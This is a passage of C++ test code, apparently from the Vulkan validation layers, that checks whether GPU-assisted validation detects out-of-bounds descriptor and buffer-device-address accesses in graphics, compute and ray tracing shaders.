{ VkResult err; m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, iter.expected_error); VkShaderObj vs(m_device, iter.vertex_source, VK_SHADER_STAGE_VERTEX_BIT, this, "main", iter.debug); VkShaderObj fs(m_device, iter.fragment_source, VK_SHADER_STAGE_FRAGMENT_BIT, this, "main", iter.debug); VkShaderObj *gs = nullptr; VkShaderObj *tcs = nullptr; VkShaderObj *tes = nullptr; VkPipelineObj pipe(m_device); pipe.AddShader(&vs); pipe.AddShader(&fs); if (iter.geometry_source) { gs = new VkShaderObj(m_device, iter.geometry_source, VK_SHADER_STAGE_GEOMETRY_BIT, this, "main", iter.debug); pipe.AddShader(gs); } if (iter.tess_ctrl_source && iter.tess_eval_source) { tcs = new VkShaderObj(m_device, iter.tess_ctrl_source, VK_SHADER_STAGE_TESSELLATION_CONTROL_BIT, this, "main", iter.debug); tes = new VkShaderObj(m_device, iter.tess_eval_source, VK_SHADER_STAGE_TESSELLATION_EVALUATION_BIT, this, "main", iter.debug); pipe.AddShader(tcs); pipe.AddShader(tes); VkPipelineInputAssemblyStateCreateInfo iasci{VK_STRUCTURE_TYPE_PIPELINE_INPUT_ASSEMBLY_STATE_CREATE_INFO, nullptr, 0, VK_PRIMITIVE_TOPOLOGY_PATCH_LIST, VK_FALSE}; VkPipelineTessellationDomainOriginStateCreateInfo tessellationDomainOriginStateInfo = { VK_STRUCTURE_TYPE_PIPELINE_TESSELLATION_DOMAIN_ORIGIN_STATE_CREATE_INFO, VK_NULL_HANDLE, VK_TESSELLATION_DOMAIN_ORIGIN_UPPER_LEFT}; VkPipelineTessellationStateCreateInfo tsci{VK_STRUCTURE_TYPE_PIPELINE_TESSELLATION_STATE_CREATE_INFO, &tessellationDomainOriginStateInfo, 0, 3}; pipe.SetTessellation(&tsci); pipe.SetInputAssembly(&iasci); } pipe.AddDefaultColorAttachment(); err = pipe.CreateVKPipeline(iter.pipeline_layout->handle(), renderPass()); ASSERT_VK_SUCCESS(err); m_commandBuffer->begin(); m_commandBuffer->BeginRenderPass(m_renderPassBeginInfo); vk::CmdBindPipeline(m_commandBuffer->handle(), VK_PIPELINE_BIND_POINT_GRAPHICS, pipe.handle()); vk::CmdBindDescriptorSets(m_commandBuffer->handle(), VK_PIPELINE_BIND_POINT_GRAPHICS, iter.pipeline_layout->handle(), 0, 1, &iter.descriptor_set->set_, 0, nullptr); vk::CmdSetViewport(m_commandBuffer->handle(), 0, 1, &viewport); vk::CmdSetScissor(m_commandBuffer->handle(), 0, 1, &scissors); vk::CmdDraw(m_commandBuffer->handle(), 3, 1, 0, 0); vk::CmdEndRenderPass(m_commandBuffer->handle()); m_commandBuffer->end(); uint32_t *data = (uint32_t *)buffer0.memory().map(); data[0] = iter.index; buffer0.memory().unmap(); vk::QueueSubmit(m_device->m_queue, 1, &submit_info, VK_NULL_HANDLE); vk::QueueWaitIdle(m_device->m_queue); m_errorMonitor->VerifyFound(); if (gs) { delete gs; } if (tcs && tes) { delete tcs; delete tes; } } auto c_queue = m_device->GetDefaultComputeQueue(); if (c_queue && descriptor_indexing) { char const *csSource = "#version 450\n" "#extension GL_EXT_nonuniform_qualifier : enable\n " "layout(set = 0, binding = 0) uniform ufoo { uint index; } u_index;" "layout(set = 0, binding = 1) buffer StorageBuffer {\n" " uint data;\n" "} Data[];\n" "void main() {\n" " Data[(u_index.index - 1)].data = Data[u_index.index].data;\n" "}\n"; auto shader_module = new VkShaderObj(m_device, csSource, VK_SHADER_STAGE_COMPUTE_BIT, this); VkPipelineShaderStageCreateInfo stage; stage.sType = VK_STRUCTURE_TYPE_PIPELINE_SHADER_STAGE_CREATE_INFO; stage.pNext = nullptr; stage.flags = 0; stage.stage = VK_SHADER_STAGE_COMPUTE_BIT; stage.module = shader_module->handle(); stage.pName = "main"; stage.pSpecializationInfo = nullptr; // CreateComputePipelines VkComputePipelineCreateInfo pipeline_info = {}; pipeline_info.sType = VK_STRUCTURE_TYPE_COMPUTE_PIPELINE_CREATE_INFO; 
pipeline_info.pNext = nullptr; pipeline_info.flags = 0; pipeline_info.layout = pipeline_layout_buffer.handle(); pipeline_info.basePipelineHandle = VK_NULL_HANDLE; pipeline_info.basePipelineIndex = -1; pipeline_info.stage = stage; VkPipeline c_pipeline; vk::CreateComputePipelines(device(), VK_NULL_HANDLE, 1, &pipeline_info, nullptr, &c_pipeline); VkCommandBufferBeginInfo begin_info = {}; VkCommandBufferInheritanceInfo hinfo = {}; hinfo.sType = VK_STRUCTURE_TYPE_COMMAND_BUFFER_INHERITANCE_INFO; begin_info.sType = VK_STRUCTURE_TYPE_COMMAND_BUFFER_BEGIN_INFO; begin_info.pInheritanceInfo = &hinfo; m_commandBuffer->begin(&begin_info); vk::CmdBindPipeline(m_commandBuffer->handle(), VK_PIPELINE_BIND_POINT_COMPUTE, c_pipeline); vk::CmdBindDescriptorSets(m_commandBuffer->handle(), VK_PIPELINE_BIND_POINT_COMPUTE, pipeline_layout_buffer.handle(), 0, 1, &descriptor_set_buffer.set_, 0, nullptr); vk::CmdDispatch(m_commandBuffer->handle(), 1, 1, 1); m_commandBuffer->end(); // Uninitialized uint32_t *data = (uint32_t *)buffer0.memory().map(); data[0] = 5; buffer0.memory().unmap(); m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "Stage = Compute"); vk::QueueSubmit(c_queue->handle(), 1, &submit_info, VK_NULL_HANDLE); vk::QueueWaitIdle(m_device->m_queue); m_errorMonitor->VerifyFound(); // Out of Bounds data = (uint32_t *)buffer0.memory().map(); data[0] = 25; buffer0.memory().unmap(); m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "Stage = Compute"); vk::QueueSubmit(c_queue->handle(), 1, &submit_info, VK_NULL_HANDLE); vk::QueueWaitIdle(m_device->m_queue); m_errorMonitor->VerifyFound(); vk::DestroyPipeline(m_device->handle(), c_pipeline, NULL); vk::DestroyShaderModule(m_device->handle(), shader_module->handle(), NULL); } return; } TEST_F(VkLayerTest, GpuBufferDeviceAddressOOB) { bool supported = InstanceExtensionSupported(VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME); m_instance_extension_names.push_back(VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME); VkValidationFeatureEnableEXT enables[] = {VK_VALIDATION_FEATURE_ENABLE_GPU_ASSISTED_EXT}; VkValidationFeaturesEXT features = {}; features.sType = VK_STRUCTURE_TYPE_VALIDATION_FEATURES_EXT; features.enabledValidationFeatureCount = 1; features.pEnabledValidationFeatures = enables; InitFramework(myDbgFunc, m_errorMonitor, &features); if (DeviceIsMockICD() || DeviceSimulation()) { printf("%s GPU-Assisted validation test requires a driver that can draw.\n", kSkipPrefix); return; } supported = supported && DeviceExtensionSupported(gpu(), nullptr, VK_KHR_BUFFER_DEVICE_ADDRESS_EXTENSION_NAME); m_device_extension_names.push_back(VK_KHR_BUFFER_DEVICE_ADDRESS_EXTENSION_NAME); VkPhysicalDeviceFeatures2KHR features2 = {}; auto bda_features = lvl_init_struct<VkPhysicalDeviceBufferDeviceAddressFeaturesKHR>(); PFN_vkGetPhysicalDeviceFeatures2KHR vkGetPhysicalDeviceFeatures2KHR = (PFN_vkGetPhysicalDeviceFeatures2KHR)vk::GetInstanceProcAddr(instance(), "vkGetPhysicalDeviceFeatures2KHR"); ASSERT_TRUE(vkGetPhysicalDeviceFeatures2KHR != nullptr); features2 = lvl_init_struct<VkPhysicalDeviceFeatures2KHR>(&bda_features); vkGetPhysicalDeviceFeatures2KHR(gpu(), &features2); supported = supported && bda_features.bufferDeviceAddress; if (!supported) { printf("%s Buffer Device Address feature not supported, skipping test\n", kSkipPrefix); return; } VkCommandPoolCreateFlags pool_flags = VK_COMMAND_POOL_CREATE_RESET_COMMAND_BUFFER_BIT; ASSERT_NO_FATAL_FAILURE(InitState(nullptr, &features2, pool_flags)); if (m_device->props.apiVersion 
< VK_API_VERSION_1_1) { printf("%s GPU-Assisted validation test requires Vulkan 1.1+.\n", kSkipPrefix); return; } ASSERT_NO_FATAL_FAILURE(InitViewport()); ASSERT_NO_FATAL_FAILURE(InitRenderTarget()); // Make a uniform buffer to be passed to the shader that contains the pointer and write count uint32_t qfi = 0; VkBufferCreateInfo bci = {}; bci.sType = VK_STRUCTURE_TYPE_BUFFER_CREATE_INFO; bci.usage = VK_BUFFER_USAGE_UNIFORM_BUFFER_BIT; bci.size = 8; bci.queueFamilyIndexCount = 1; bci.pQueueFamilyIndices = &qfi; VkBufferObj buffer0; VkMemoryPropertyFlags mem_props = VK_MEMORY_PROPERTY_HOST_VISIBLE_BIT | VK_MEMORY_PROPERTY_HOST_COHERENT_BIT; buffer0.init(*m_device, bci, mem_props); // Make another buffer to write to bci.usage = VK_BUFFER_USAGE_SHADER_DEVICE_ADDRESS_BIT_KHR; bci.size = 64; // Buffer should be 16*4 = 64 bytes VkBuffer buffer1; vk::CreateBuffer(device(), &bci, NULL, &buffer1); VkMemoryRequirements buffer_mem_reqs = {}; vk::GetBufferMemoryRequirements(device(), buffer1, &buffer_mem_reqs); VkMemoryAllocateInfo buffer_alloc_info = {}; buffer_alloc_info.sType = VK_STRUCTURE_TYPE_MEMORY_ALLOCATE_INFO; buffer_alloc_info.allocationSize = buffer_mem_reqs.size; m_device->phy().set_memory_type(buffer_mem_reqs.memoryTypeBits, &buffer_alloc_info, 0); VkMemoryAllocateFlagsInfo alloc_flags = {VK_STRUCTURE_TYPE_MEMORY_ALLOCATE_FLAGS_INFO}; alloc_flags.flags = VK_MEMORY_ALLOCATE_DEVICE_ADDRESS_BIT_KHR; buffer_alloc_info.pNext = &alloc_flags; VkDeviceMemory buffer_mem; VkResult err = vk::AllocateMemory(device(), &buffer_alloc_info, NULL, &buffer_mem); ASSERT_VK_SUCCESS(err); vk::BindBufferMemory(m_device->device(), buffer1, buffer_mem, 0); // Get device address of buffer to write to VkBufferDeviceAddressInfoKHR bda_info = {}; bda_info.sType = VK_STRUCTURE_TYPE_BUFFER_DEVICE_ADDRESS_INFO_KHR; bda_info.buffer = buffer1; auto vkGetBufferDeviceAddressKHR = (PFN_vkGetBufferDeviceAddressKHR)vk::GetDeviceProcAddr(m_device->device(), "vkGetBufferDeviceAddressKHR"); ASSERT_TRUE(vkGetBufferDeviceAddressKHR != nullptr); auto pBuffer = vkGetBufferDeviceAddressKHR(m_device->device(), &bda_info); OneOffDescriptorSet descriptor_set(m_device, {{0, VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER, 1, VK_SHADER_STAGE_ALL, nullptr}}); const VkPipelineLayoutObj pipeline_layout(m_device, {&descriptor_set.layout_}); VkDescriptorBufferInfo buffer_test_buffer_info[2] = {}; buffer_test_buffer_info[0].buffer = buffer0.handle(); buffer_test_buffer_info[0].offset = 0; buffer_test_buffer_info[0].range = sizeof(uint32_t); VkWriteDescriptorSet descriptor_writes[1] = {}; descriptor_writes[0].sType = VK_STRUCTURE_TYPE_WRITE_DESCRIPTOR_SET; descriptor_writes[0].dstSet = descriptor_set.set_; descriptor_writes[0].dstBinding = 0; descriptor_writes[0].descriptorCount = 1; descriptor_writes[0].descriptorType = VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER; descriptor_writes[0].pBufferInfo = buffer_test_buffer_info; vk::UpdateDescriptorSets(m_device->device(), 1, descriptor_writes, 0, NULL); char const *shader_source = "#version 450\n" "#extension GL_EXT_buffer_reference : enable\n " "layout(buffer_reference, buffer_reference_align = 16) buffer bufStruct;\n" "layout(set = 0, binding = 0) uniform ufoo {\n" " bufStruct data;\n" " int nWrites;\n" "} u_info;\n" "layout(buffer_reference, std140) buffer bufStruct {\n" " int a[4];\n" "};\n" "void main() {\n" " for (int i=0; i < u_info.nWrites; ++i) {\n" " u_info.data.a[i] = 0xdeadca71;\n" " }\n" "}\n"; VkShaderObj vs(m_device, shader_source, VK_SHADER_STAGE_VERTEX_BIT, this, "main", true); VkViewport viewport = 
m_viewports[0]; VkRect2D scissors = m_scissors[0]; VkSubmitInfo submit_info = {}; submit_info.sType = VK_STRUCTURE_TYPE_SUBMIT_INFO; submit_info.commandBufferCount = 1; submit_info.pCommandBuffers = &m_commandBuffer->handle(); VkPipelineObj pipe(m_device); pipe.AddShader(&vs); pipe.AddDefaultColorAttachment(); err = pipe.CreateVKPipeline(pipeline_layout.handle(), renderPass()); ASSERT_VK_SUCCESS(err); VkCommandBufferBeginInfo begin_info = {}; VkCommandBufferInheritanceInfo hinfo = {}; hinfo.sType = VK_STRUCTURE_TYPE_COMMAND_BUFFER_INHERITANCE_INFO; begin_info.sType = VK_STRUCTURE_TYPE_COMMAND_BUFFER_BEGIN_INFO; begin_info.pInheritanceInfo = &hinfo; m_commandBuffer->begin(&begin_info); m_commandBuffer->BeginRenderPass(m_renderPassBeginInfo); vk::CmdBindPipeline(m_commandBuffer->handle(), VK_PIPELINE_BIND_POINT_GRAPHICS, pipe.handle()); vk::CmdBindDescriptorSets(m_commandBuffer->handle(), VK_PIPELINE_BIND_POINT_GRAPHICS, pipeline_layout.handle(), 0, 1, &descriptor_set.set_, 0, nullptr); vk::CmdSetViewport(m_commandBuffer->handle(), 0, 1, &viewport); vk::CmdSetScissor(m_commandBuffer->handle(), 0, 1, &scissors); vk::CmdDraw(m_commandBuffer->handle(), 3, 1, 0, 0); vk::CmdEndRenderPass(m_commandBuffer->handle()); m_commandBuffer->end(); // Starting address too low VkDeviceAddress *data = (VkDeviceAddress *)buffer0.memory().map(); data[0] = pBuffer - 16; data[1] = 4; buffer0.memory().unmap(); m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "access out of bounds"); err = vk::QueueSubmit(m_device->m_queue, 1, &submit_info, VK_NULL_HANDLE); ASSERT_VK_SUCCESS(err); err = vk::QueueWaitIdle(m_device->m_queue); ASSERT_VK_SUCCESS(err); m_errorMonitor->VerifyFound(); // Run past the end data = (VkDeviceAddress *)buffer0.memory().map(); data[0] = pBuffer; data[1] = 5; buffer0.memory().unmap(); m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "access out of bounds"); err = vk::QueueSubmit(m_device->m_queue, 1, &submit_info, VK_NULL_HANDLE); ASSERT_VK_SUCCESS(err); err = vk::QueueWaitIdle(m_device->m_queue); ASSERT_VK_SUCCESS(err); m_errorMonitor->VerifyFound(); // Positive test - stay inside buffer m_errorMonitor->ExpectSuccess(); data = (VkDeviceAddress *)buffer0.memory().map(); data[0] = pBuffer; data[1] = 4; buffer0.memory().unmap(); err = vk::QueueSubmit(m_device->m_queue, 1, &submit_info, VK_NULL_HANDLE); ASSERT_VK_SUCCESS(err); err = vk::QueueWaitIdle(m_device->m_queue); ASSERT_VK_SUCCESS(err); m_errorMonitor->VerifyNotFound(); vk::DestroyBuffer(m_device->handle(), buffer1, NULL); vk::FreeMemory(m_device->handle(), buffer_mem, NULL); } TEST_F(VkLayerTest, GpuValidationArrayOOBRayTracingShaders) { TEST_DESCRIPTION( "GPU validation: Verify detection of out-of-bounds descriptor array indexing and use of uninitialized descriptors for " "ray tracing shaders."); std::array<const char *, 1> required_instance_extensions = {VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME}; for (auto instance_extension : required_instance_extensions) { if (InstanceExtensionSupported(instance_extension)) { m_instance_extension_names.push_back(instance_extension); } else { printf("%s Did not find required instance extension %s; skipped.\n", kSkipPrefix, instance_extension); return; } } VkValidationFeatureEnableEXT validation_feature_enables[] = {VK_VALIDATION_FEATURE_ENABLE_GPU_ASSISTED_EXT}; VkValidationFeaturesEXT validation_features = {}; validation_features.sType = VK_STRUCTURE_TYPE_VALIDATION_FEATURES_EXT; validation_features.enabledValidationFeatureCount = 1; 
validation_features.pEnabledValidationFeatures = validation_feature_enables; bool descriptor_indexing = CheckDescriptorIndexingSupportAndInitFramework( this, m_instance_extension_names, m_device_extension_names, &validation_features, m_errorMonitor); if (DeviceIsMockICD() || DeviceSimulation()) { printf("%s Test not supported by MockICD, skipping tests\n", kSkipPrefix); return; } std::array<const char *, 2> required_device_extensions = {VK_KHR_GET_MEMORY_REQUIREMENTS_2_EXTENSION_NAME, VK_NV_RAY_TRACING_EXTENSION_NAME}; for (auto device_extension : required_device_extensions) { if (DeviceExtensionSupported(gpu(), nullptr, device_extension)) { m_device_extension_names.push_back(device_extension); } else { printf("%s %s Extension not supported, skipping tests\n", kSkipPrefix, device_extension); return; } } VkPhysicalDeviceFeatures2KHR features2 = {}; auto indexing_features = lvl_init_struct<VkPhysicalDeviceDescriptorIndexingFeaturesEXT>(); if (descriptor_indexing) { PFN_vkGetPhysicalDeviceFeatures2KHR vkGetPhysicalDeviceFeatures2KHR = (PFN_vkGetPhysicalDeviceFeatures2KHR)vk::GetInstanceProcAddr(instance(), "vkGetPhysicalDeviceFeatures2KHR"); ASSERT_TRUE(vkGetPhysicalDeviceFeatures2KHR != nullptr); features2 = lvl_init_struct<VkPhysicalDeviceFeatures2KHR>(&indexing_features); vkGetPhysicalDeviceFeatures2KHR(gpu(), &features2); if (!indexing_features.runtimeDescriptorArray || !indexing_features.descriptorBindingPartiallyBound || !indexing_features.descriptorBindingSampledImageUpdateAfterBind || !indexing_features.descriptorBindingVariableDescriptorCount) { printf("Not all descriptor indexing features supported, skipping descriptor indexing tests\n"); descriptor_indexing = false; } } VkCommandPoolCreateFlags pool_flags = VK_COMMAND_POOL_CREATE_RESET_COMMAND_BUFFER_BIT; ASSERT_NO_FATAL_FAILURE(InitState(nullptr, &features2, pool_flags)); PFN_vkGetPhysicalDeviceProperties2KHR vkGetPhysicalDeviceProperties2KHR = (PFN_vkGetPhysicalDeviceProperties2KHR)vk::GetInstanceProcAddr(instance(), "vkGetPhysicalDeviceProperties2KHR"); ASSERT_TRUE(vkGetPhysicalDeviceProperties2KHR != nullptr); auto ray_tracing_properties = lvl_init_struct<VkPhysicalDeviceRayTracingPropertiesNV>(); auto properties2 = lvl_init_struct<VkPhysicalDeviceProperties2KHR>(&ray_tracing_properties); vkGetPhysicalDeviceProperties2KHR(gpu(), &properties2); if (ray_tracing_properties.maxTriangleCount == 0) { printf("%s Did not find required ray tracing properties; skipped.\n", kSkipPrefix); return; } VkQueue ray_tracing_queue = m_device->m_queue; uint32_t ray_tracing_queue_family_index = 0; // If supported, run on the compute only queue. 
uint32_t compute_only_queue_family_index = m_device->QueueFamilyMatching(VK_QUEUE_COMPUTE_BIT, VK_QUEUE_GRAPHICS_BIT); if (compute_only_queue_family_index != UINT32_MAX) { const auto &compute_only_queues = m_device->queue_family_queues(compute_only_queue_family_index); if (!compute_only_queues.empty()) { ray_tracing_queue = compute_only_queues[0]->handle(); ray_tracing_queue_family_index = compute_only_queue_family_index; } } VkCommandPoolObj ray_tracing_command_pool(m_device, ray_tracing_queue_family_index, VK_COMMAND_POOL_CREATE_RESET_COMMAND_BUFFER_BIT); VkCommandBufferObj ray_tracing_command_buffer(m_device, &ray_tracing_command_pool); struct AABB { float min_x; float min_y; float min_z; float max_x; float max_y; float max_z; }; const std::vector<AABB> aabbs = {{-1.0f, -1.0f, -1.0f, +1.0f, +1.0f, +1.0f}}; struct VkGeometryInstanceNV { float transform[12]; uint32_t instanceCustomIndex : 24; uint32_t mask : 8; uint32_t instanceOffset : 24; uint32_t flags : 8; uint64_t accelerationStructureHandle; }; VkDeviceSize aabb_buffer_size = sizeof(AABB) * aabbs.size(); VkBufferObj aabb_buffer; aabb_buffer.init(*m_device, aabb_buffer_size, VK_MEMORY_PROPERTY_HOST_VISIBLE_BIT | VK_MEMORY_PROPERTY_HOST_COHERENT_BIT, VK_BUFFER_USAGE_RAY_TRACING_BIT_NV, {ray_tracing_queue_family_index}); uint8_t *mapped_aabb_buffer_data = (uint8_t *)aabb_buffer.memory().map(); std::memcpy(mapped_aabb_buffer_data, (uint8_t *)aabbs.data(), static_cast<std::size_t>(aabb_buffer_size)); aabb_buffer.memory().unmap(); VkGeometryNV geometry = {}; geometry.sType = VK_STRUCTURE_TYPE_GEOMETRY_NV; geometry.geometryType = VK_GEOMETRY_TYPE_AABBS_NV; geometry.geometry.triangles = {}; geometry.geometry.triangles.sType = VK_STRUCTURE_TYPE_GEOMETRY_TRIANGLES_NV; geometry.geometry.aabbs = {}; geometry.geometry.aabbs.sType = VK_STRUCTURE_TYPE_GEOMETRY_AABB_NV; geometry.geometry.aabbs.aabbData = aabb_buffer.handle(); geometry.geometry.aabbs.numAABBs = static_cast<uint32_t>(aabbs.size()); geometry.geometry.aabbs.offset = 0; geometry.geometry.aabbs.stride = static_cast<VkDeviceSize>(sizeof(AABB)); geometry.flags = 0; VkAccelerationStructureInfoNV bot_level_as_info = {}; bot_level_as_info.sType = VK_STRUCTURE_TYPE_ACCELERATION_STRUCTURE_INFO_NV; bot_level_as_info.type = VK_ACCELERATION_STRUCTURE_TYPE_BOTTOM_LEVEL_NV; bot_level_as_info.instanceCount = 0; bot_level_as_info.geometryCount = 1; bot_level_as_info.pGeometries = &geometry; VkAccelerationStructureCreateInfoNV bot_level_as_create_info = {}; bot_level_as_create_info.sType = VK_STRUCTURE_TYPE_ACCELERATION_STRUCTURE_CREATE_INFO_NV; bot_level_as_create_info.info = bot_level_as_info; VkAccelerationStructureObj bot_level_as(*m_device, bot_level_as_create_info); const std::vector<VkGeometryInstanceNV> instances = { VkGeometryInstanceNV{ { // clang-format off 1.0f, 0.0f, 0.0f, 0.0f, 0.0f, 1.0f, 0.0f, 0.0f, 0.0f, 0.0f, 1.0f, 0.0f, // clang-format on }, 0, 0xFF, 0, VK_GEOMETRY_INSTANCE_TRIANGLE_CULL_DISABLE_BIT_NV, bot_level_as.opaque_handle(), }, }; VkDeviceSize instance_buffer_size = sizeof(VkGeometryInstanceNV) * instances.size(); VkBufferObj instance_buffer; instance_buffer.init(*m_device, instance_buffer_size, VK_MEMORY_PROPERTY_HOST_VISIBLE_BIT | VK_MEMORY_PROPERTY_HOST_COHERENT_BIT, VK_BUFFER_USAGE_RAY_TRACING_BIT_NV, {ray_tracing_queue_family_index}); uint8_t *mapped_instance_buffer_data = (uint8_t *)instance_buffer.memory().map(); std::memcpy(mapped_instance_buffer_data, (uint8_t *)instances.data(), static_cast<std::size_t>(instance_buffer_size)); instance_buffer.memory().unmap(); 
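    // Build the top-level acceleration structure over the single instance copied into instance_buffer above.
    // A top-level AS is populated from instances rather than geometry, so geometryCount stays 0 below.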
VkAccelerationStructureInfoNV top_level_as_info = {}; top_level_as_info.sType = VK_STRUCTURE_TYPE_ACCELERATION_STRUCTURE_INFO_NV; top_level_as_info.type = VK_ACCELERATION_STRUCTURE_TYPE_TOP_LEVEL_NV; top_level_as_info.instanceCount = 1; top_level_as_info.geometryCount = 0; VkAccelerationStructureCreateInfoNV top_level_as_create_info = {}; top_level_as_create_info.sType = VK_STRUCTURE_TYPE_ACCELERATION_STRUCTURE_CREATE_INFO_NV; top_level_as_create_info.info = top_level_as_info; VkAccelerationStructureObj top_level_as(*m_device, top_level_as_create_info); VkDeviceSize scratch_buffer_size = std::max(bot_level_as.build_scratch_memory_requirements().memoryRequirements.size, top_level_as.build_scratch_memory_requirements().memoryRequirements.size); VkBufferObj scratch_buffer; scratch_buffer.init(*m_device, scratch_buffer_size, VK_MEMORY_PROPERTY_DEVICE_LOCAL_BIT, VK_BUFFER_USAGE_RAY_TRACING_BIT_NV); ray_tracing_command_buffer.begin(); // Build bot level acceleration structure ray_tracing_command_buffer.BuildAccelerationStructure(&bot_level_as, scratch_buffer.handle()); // Barrier to prevent using scratch buffer for top level build before bottom level build finishes VkMemoryBarrier memory_barrier = {}; memory_barrier.sType = VK_STRUCTURE_TYPE_MEMORY_BARRIER; memory_barrier.srcAccessMask = VK_ACCESS_ACCELERATION_STRUCTURE_READ_BIT_NV | VK_ACCESS_ACCELERATION_STRUCTURE_WRITE_BIT_NV; memory_barrier.dstAccessMask = VK_ACCESS_ACCELERATION_STRUCTURE_READ_BIT_NV | VK_ACCESS_ACCELERATION_STRUCTURE_WRITE_BIT_NV; ray_tracing_command_buffer.PipelineBarrier(VK_PIPELINE_STAGE_ACCELERATION_STRUCTURE_BUILD_BIT_NV, VK_PIPELINE_STAGE_ACCELERATION_STRUCTURE_BUILD_BIT_NV, 0, 1, &memory_barrier, 0, nullptr, 0, nullptr); // Build top level acceleration structure ray_tracing_command_buffer.BuildAccelerationStructure(&top_level_as, scratch_buffer.handle(), instance_buffer.handle()); ray_tracing_command_buffer.end(); VkSubmitInfo submit_info = {}; submit_info.sType = VK_STRUCTURE_TYPE_SUBMIT_INFO; submit_info.commandBufferCount = 1; submit_info.pCommandBuffers = &ray_tracing_command_buffer.handle(); vk::QueueSubmit(ray_tracing_queue, 1, &submit_info, VK_NULL_HANDLE); vk::QueueWaitIdle(ray_tracing_queue); m_errorMonitor->VerifyNotFound(); VkTextureObj texture(m_device, nullptr); VkSamplerObj sampler(m_device); VkDeviceSize storage_buffer_size = 1024; VkBufferObj storage_buffer; storage_buffer.init(*m_device, storage_buffer_size, VK_MEMORY_PROPERTY_HOST_VISIBLE_BIT | VK_MEMORY_PROPERTY_HOST_COHERENT_BIT, VK_BUFFER_USAGE_STORAGE_BUFFER_BIT, {ray_tracing_queue_family_index}); VkDeviceSize shader_binding_table_buffer_size = ray_tracing_properties.shaderGroupHandleSize * 4ull; VkBufferObj shader_binding_table_buffer; shader_binding_table_buffer.init(*m_device, shader_binding_table_buffer_size, VK_MEMORY_PROPERTY_HOST_VISIBLE_BIT | VK_MEMORY_PROPERTY_HOST_COHERENT_BIT, VK_BUFFER_USAGE_RAY_TRACING_BIT_NV, {ray_tracing_queue_family_index}); // Setup descriptors! 
const VkShaderStageFlags kAllRayTracingStages = VK_SHADER_STAGE_RAYGEN_BIT_NV | VK_SHADER_STAGE_ANY_HIT_BIT_NV | VK_SHADER_STAGE_CLOSEST_HIT_BIT_NV | VK_SHADER_STAGE_MISS_BIT_NV | VK_SHADER_STAGE_INTERSECTION_BIT_NV | VK_SHADER_STAGE_CALLABLE_BIT_NV; void *layout_pnext = nullptr; void *allocate_pnext = nullptr; VkDescriptorPoolCreateFlags pool_create_flags = 0; VkDescriptorSetLayoutCreateFlags layout_create_flags = 0; VkDescriptorBindingFlagsEXT ds_binding_flags[3] = {}; VkDescriptorSetLayoutBindingFlagsCreateInfoEXT layout_createinfo_binding_flags[1] = {}; if (descriptor_indexing) { ds_binding_flags[0] = 0; ds_binding_flags[1] = 0; ds_binding_flags[2] = VK_DESCRIPTOR_BINDING_PARTIALLY_BOUND_BIT_EXT | VK_DESCRIPTOR_BINDING_UPDATE_AFTER_BIND_BIT_EXT; layout_createinfo_binding_flags[0].sType = VK_STRUCTURE_TYPE_DESCRIPTOR_SET_LAYOUT_BINDING_FLAGS_CREATE_INFO_EXT; layout_createinfo_binding_flags[0].pNext = NULL; layout_createinfo_binding_flags[0].bindingCount = 3; layout_createinfo_binding_flags[0].pBindingFlags = ds_binding_flags; layout_create_flags = VK_DESCRIPTOR_SET_LAYOUT_CREATE_UPDATE_AFTER_BIND_POOL_BIT_EXT; pool_create_flags = VK_DESCRIPTOR_SET_LAYOUT_CREATE_UPDATE_AFTER_BIND_POOL_BIT_EXT; layout_pnext = layout_createinfo_binding_flags; } // Prepare descriptors OneOffDescriptorSet ds(m_device, { {0, VK_DESCRIPTOR_TYPE_ACCELERATION_STRUCTURE_NV, 1, kAllRayTracingStages, nullptr}, {1, VK_DESCRIPTOR_TYPE_STORAGE_BUFFER, 1, kAllRayTracingStages, nullptr}, {2, VK_DESCRIPTOR_TYPE_COMBINED_IMAGE_SAMPLER, 6, kAllRayTracingStages, nullptr}, }, layout_create_flags, layout_pnext, pool_create_flags); VkDescriptorSetVariableDescriptorCountAllocateInfoEXT variable_count = {}; uint32_t desc_counts; if (descriptor_indexing) { layout_create_flags = 0; pool_create_flags = 0; ds_binding_flags[2] = VK_DESCRIPTOR_BINDING_PARTIALLY_BOUND_BIT_EXT | VK_DESCRIPTOR_BINDING_VARIABLE_DESCRIPTOR_COUNT_BIT_EXT; desc_counts = 6; // We'll reserve 8 spaces in the layout, but the descriptor will only use 6 variable_count.sType = VK_STRUCTURE_TYPE_DESCRIPTOR_SET_VARIABLE_DESCRIPTOR_COUNT_ALLOCATE_INFO_EXT; variable_count.descriptorSetCount = 1; variable_count.pDescriptorCounts = &desc_counts; allocate_pnext = &variable_count; } OneOffDescriptorSet ds_variable(m_device, { {0, VK_DESCRIPTOR_TYPE_ACCELERATION_STRUCTURE_NV, 1, kAllRayTracingStages, nullptr}, {1, VK_DESCRIPTOR_TYPE_STORAGE_BUFFER, 1, kAllRayTracingStages, nullptr}, {2, VK_DESCRIPTOR_TYPE_COMBINED_IMAGE_SAMPLER, 8, kAllRayTracingStages, nullptr}, }, layout_create_flags, layout_pnext, pool_create_flags, allocate_pnext); VkAccelerationStructureNV top_level_as_handle = top_level_as.handle(); VkWriteDescriptorSetAccelerationStructureNV write_descript_set_as = {}; write_descript_set_as.sType = VK_STRUCTURE_TYPE_WRITE_DESCRIPTOR_SET_ACCELERATION_STRUCTURE_NV; write_descript_set_as.accelerationStructureCount = 1; write_descript_set_as.pAccelerationStructures = &top_level_as_handle; VkDescriptorBufferInfo descriptor_buffer_info = {}; descriptor_buffer_info.buffer = storage_buffer.handle(); descriptor_buffer_info.offset = 0; descriptor_buffer_info.range = storage_buffer_size; VkDescriptorImageInfo descriptor_image_infos[6] = {}; for (int i = 0; i < 6; i++) { descriptor_image_infos[i] = texture.DescriptorImageInfo(); descriptor_image_infos[i].sampler = sampler.handle(); descriptor_image_infos[i].imageLayout = 